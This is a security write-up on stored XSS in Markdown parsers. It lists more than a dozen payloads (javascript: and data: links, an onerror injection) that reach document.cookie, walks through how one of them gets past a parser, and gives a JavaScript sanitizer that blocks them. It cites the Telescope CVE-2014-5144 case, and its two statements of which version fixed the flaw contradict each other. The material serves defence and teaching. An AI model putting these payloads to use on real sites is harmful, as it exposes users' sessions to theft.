Vulnerability Analysis: a persistent XSS vulnerability in a Markdown parser
What is Markdown?
Markdown is a lightweight markup language. Its popularity has been driven by wide support from GitHub and Stack Overflow, and an ordinary person can get started with it easily.
Writing articles in Markdown is pleasant: you can leave all the trivial HTML tags behind. Over the past five years Markdown has received a lot of attention. Many applications, including Reddit, GitHub and Stack Overflow, use it, which has also led to the emergence of many Markdown parsers; some Markdown syntax is defined here. The convention is that the Markdown parser converts this markup into HTML tags.
The security status quo of Markdown
What is the security status of the Markdown parser? Does it filter user input data?
In fact, many Markdown parsers do not filter user input at all. If Markdown is used for user comments and similar features, there may be security risks.
Here are some discussions about this issue: [1], [2], [3].
In addition, if you use Google to search:
markdown xss issue site:github.com
you will find XSS vulnerabilities in many high-star projects on GitHub.
So how are such payloads constructed? See the following:
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))
<javascript:prompt(document.cookie)>
<javascript:alert('XSS')>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
The above payloads were developed by Aleksa and the original author. Over the past 12 months they have proven valid in actual penetration tests, and many Markdown parsers are affected. Let's take a look at the last payload:
[test](javascript://%0d%0aprompt(1);com)
We guess that the Markdown parser performs parsing and conversion through the following steps:
Is there a protocol header? // javascript: pseudo-protocol, yes
Does the hostname end with a common domain suffix (com, org, ...)? // Yes, it ends with com
Convert the preceding payload to an HTML tag. // The result is as follows:
<a href="javascript://%0d%0aprompt(1);com">test</a>
The XSS payload has been constructed successfully! Once you click the above link, the XSS is triggered.
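As an added example (not Telescope's code, nor any real parser's implementation), here is the check a renderer can apply at the first step instead of trusting the raw string: normalise the destination roughly the way a browser would (percent-decode, strip control characters and whitespace, lowercase the scheme), allow only a short scheme list, and attribute-escape link text and alt text so the onerror payload above stays inert. The allowlist (http, https, mailto) and the function names are assumptions.

```javascript
// Added example, not Telescope's code: scheme allowlist + attribute escaping
// for Markdown link/image rendering. Allowlist is an assumption.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;",
  })[c]);
}

// Reduce a destination to the scheme a browser would dispatch on:
// percent-decode, strip ASCII control characters and whitespace, lowercase.
// Stripping all whitespace is deliberately conservative (it rejects more than a
// browser would execute), so "j a v a s c r i p t:" still classifies as javascript.
function schemeOf(dest) {
  let s = dest;
  try { s = decodeURIComponent(s); } catch (e) { /* malformed escapes: keep raw form */ }
  s = s.replace(/[\u0000-\u0020\u007f]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null; // null = relative URL, no scheme at all
}

function isSafeDestination(dest) {
  const scheme = schemeOf(dest);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Unsafe destinations degrade to plain escaped text instead of becoming a tag.
function renderLink(text, dest) {
  if (!isSafeDestination(dest)) return escapeHtml(text);
  return `<a href="${escapeHtml(dest)}">${escapeHtml(text)}</a>`;
}

// Alt text is escaped as an attribute value, so quotes cannot close alt="...".
function renderImage(alt, dest) {
  if (!isSafeDestination(dest)) return escapeHtml(alt);
  return `<img src="${escapeHtml(dest)}" alt="${escapeHtml(alt)}">`;
}

// Constructed inputs taken from the payload list above, plus two benign links.
const samples = [
  ["test", "javascript://%0d%0aprompt(1);com"],
  ["a", "j a v a s c r i p t:prompt(document.cookie)"],
  ["a", "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"],
  ["docs", "https://example.com/docs"],
  ["home", "/posts/1"],
];
for (const [text, dest] of samples) console.log(isSafeDestination(dest), renderLink(text, dest));
```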
A persistent XSS vulnerability (CVE-2014-5144)
Telescope is a well-known open-source project that provides community features like Reddit and Hacker News. Telescope's posts and comments had an XSS vulnerability, and this feature has been around for a long time!
In versions earlier than 0.9.3, the above payload list could trigger an XSS vulnerability when posting or commenting. The vulnerability has been fixed; Telescope published the changelog here: http://www.telesc.pe/blog/telescope-v093-dailyscope/
The payloads corresponding to the vulnerability are as follows:
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
Note: The preceding vulnerability has been fixed in Telescope >= 0.7.3.